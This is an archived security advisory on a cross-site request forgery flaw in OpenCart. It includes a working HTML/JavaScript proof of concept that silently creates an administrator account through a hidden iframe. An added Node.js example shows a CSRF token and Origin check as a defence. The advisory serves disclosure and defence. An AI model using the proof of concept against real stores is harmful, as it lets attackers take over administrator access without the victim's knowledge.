securityvulns: SECURITYVULNS:DOC:23162
Feb 04, 2010 - 12:00 a.m.

OpenCart CSRF Vulnerability

Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to cross-site request forgery (CSRF) attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OpenCart CSRF Vulnerability</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
function csrfInjection()
{
var params = {
'username' : 'an_attacker',
'firstname' : 'attack',
'lastname' : 'user',
'email' : '[email protected]',
'user_group_id' : '1', //Default group id for administrator level is 1
'password' : 'test',
'confirm' : 'test',
'status' : '1'
};

var form = document.createElement("form");
form.setAttribute("method", "post");
form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

for(var key in params) {
    var hiddenField = document.createElement("input");
    hiddenField.setAttribute("type", "hidden");
    hiddenField.setAttribute("name", key);
    hiddenField.setAttribute("value", params[key]);

    form.appendChild(hiddenField);
}

attack_result.document.body.appendChild(form);
form.submit();
}
</script>

</head>
<body>
OpenCart CSRF Vulnerability

<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
<a href="#" onclick="csrfInjection();return false;">Add User</a>

<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

</body>
</html>
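
The forged POST described above succeeds because the user/user/insert route accepts any request that carries the administrator's session cookie. The following server-side check is an added example, not OpenCart's code and not part of the original advisory; it is written in JavaScript (Node.js) to match the page's proof of concept, and the origin `https://shop.example`, the `csrf_token` field name and the request and session object shapes are assumptions.

```javascript
// Added example: per-session CSRF token check for state-changing admin routes.
const { randomBytes, timingSafeEqual } = require('node:crypto');

const ADMIN_ORIGIN = 'https://shop.example'; // assumed admin origin (placeholder)

// Issue one unpredictable token per admin session; the admin form embeds it
// as a hidden field named csrf_token (hypothetical field name).
function issueCsrfToken(session) {
  session.csrfToken = randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Constant-time comparison that also rejects missing or wrong-length values.
function tokensMatch(expected, supplied) {
  if (typeof expected !== 'string' || typeof supplied !== 'string') return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(supplied);
  return a.length === b.length && timingSafeEqual(a, b);
}

// Decide whether a request may reach the handler. GET/HEAD pass because they
// must not change state; every other method needs a same-origin Origin header
// (when the browser sends one) and the session's token in the body.
function checkCsrf(req, session) {
  if (req.method === 'GET' || req.method === 'HEAD') return { allowed: true, reason: 'safe method' };
  const origin = req.headers.origin;
  if (origin !== undefined && origin !== ADMIN_ORIGIN) return { allowed: false, reason: 'cross-origin' };
  if (!tokensMatch(session.csrfToken, req.body.csrf_token)) return { allowed: false, reason: 'bad token' };
  return { allowed: true, reason: 'token ok' };
}

// Constructed sample: one admin session and three POSTs to the route named
// in the advisory (cross-site form, no Origin header, genuine admin form).
function demo() {
  const session = { userId: 1 };
  const token = issueCsrfToken(session);
  const route = '/index.php?route=user/user/insert';
  const fields = { username: 'new_admin', user_group_id: '1', status: '1' };
  const forged = { method: 'POST', url: route, headers: { origin: 'https://other.example' }, body: { ...fields } };
  const noOrigin = { method: 'POST', url: route, headers: {}, body: { ...fields } };
  const genuine = { method: 'POST', url: route, headers: { origin: ADMIN_ORIGIN }, body: { ...fields, csrf_token: token } };
  return [forged, noOrigin, genuine].map((r) => checkCsrf(r, session));
}

console.log(demo());
```

The token check is what stops the request when no Origin header is present; the Origin comparison is an additional early rejection, not a replacement for the token.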